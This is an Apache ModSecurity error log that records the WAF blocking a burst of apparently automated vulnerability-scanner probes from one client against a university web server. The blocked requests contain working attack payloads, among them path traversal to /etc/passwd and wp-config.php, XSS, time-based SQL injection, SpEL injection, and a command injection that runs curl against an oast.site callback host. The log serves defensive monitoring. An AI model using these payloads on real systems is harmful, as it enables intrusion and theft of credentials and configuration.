[Tue Aug 29 11:37:35.390881 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAW51g8AAAAF"]
[Tue Aug 29 11:37:37.403235 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWBBVIAAAAB"]
[Tue Aug 29 11:37:45.494458 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWvFKkAAAAa"]
[Tue Aug 29 11:37:47.568013 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWpXsEAAAAW"]
[Tue Aug 29 11:37:50.446598 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWpXs0AAAAW"]
[Tue Aug 29 11:37:52.387462 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAUFdowAAAA9"]
[Tue Aug 29 11:37:59.396968 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAUFdqgAAAA9"]
[Tue Aug 29 11:37:59.547562 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXVynwAAAAB"]
[Tue Aug 29 11:38:10.803210 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXWLKUAAAAD"]
[Tue Aug 29 11:38:14.785636 2023] [:error] [pid 1497] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.46.70.35_d67e5c77ccb4028457e4bbb31078a8f9aaae79dc"): Internal error [hostname "digilibfeb.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXZhN8AAAAH"]
[Tue Aug 29 11:38:14.900676 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.154_4beac20f66f8a379a801308d5aeb55f6d68ce5e4"): Internal error [hostname "digilibfeb.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXlRoQAAAAV"]
[Tue Aug 29 11:38:15.151075 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "89.208.136.177_704e58d2f287a29a8508982f1aec5ba84ac19fd0"): Internal error [hostname "digilibfeb.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAX4pjkAAAAF"]
[Tue Aug 29 11:38:23.426946 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXz7A0AAAAk"]
[Tue Aug 29 11:38:33.378192 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXK6E0AAAAY"]
[Tue Aug 29 11:38:34.434578 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYMWHgAAAAR"]
[Tue Aug 29 11:38:34.509337 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gubdombpqynj4q.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAV1EbMAAAAd"]
[Tue Aug 29 11:38:35.367000 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAV1EbUAAAAd"]
[Tue Aug 29 11:38:46.364701 2023] [:error] [pid 1565] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYdUesAAAAQ"]
[Tue Aug 29 11:38:47.361107 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYKOS0AAAAP"]
[Tue Aug 29 11:38:47.392690 2023] [:error] [pid 1550] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYOaF8AAAAa"]
[Tue Aug 29 11:38:56.480055 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAXYiOYAAAAG"]
[Tue Aug 29 11:38:57.380407 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYelWUAAAAV"]
[Tue Aug 29 11:38:57.403665 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYIYlIAAAAM"]
[Tue Aug 29 11:39:06.005083 2023] [:error] [pid 1677] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAaNDusAAAAQ"]
[Tue Aug 29 11:39:07.071270 2023] [:error] [pid 1672] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaIwvIAAAAH"]
[Tue Aug 29 11:39:11.859431 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAgAAAAL"]
[Tue Aug 29 11:39:12.141806 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAagEw4AAAAn"]
[Tue Aug 29 11:39:12.457083 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAYlCOEAAAAP"]
[Tue Aug 29 11:39:13.325893 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAYcuswAAAAN"]
[Tue Aug 29 11:39:19.405621 2023] [:error] [pid 1766] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12d8Co-f0AAAbmR@MAAAAh"]
[Tue Aug 29 11:39:23.512580 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAXVyz8AAAAB"]
[Tue Aug 29 11:39:36.373041 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAaW4PkAAAAk"]
[Tue Aug 29 11:39:48.046899 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYf-DcAAAAD"]
[Tue Aug 29 11:39:56.414200 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAXQKJgAAAAj"]
[Tue Aug 29 11:40:01.404712 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g6ioandt3zicm3.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12ocCo-f0AAAcaVK4AAAAu"]
[Tue Aug 29 11:40:07.388169 2023] [:error] [pid 1766] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12p8Co-f0AAAbmSEAAAAAh"]
[Tue Aug 29 11:40:07.402863 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id 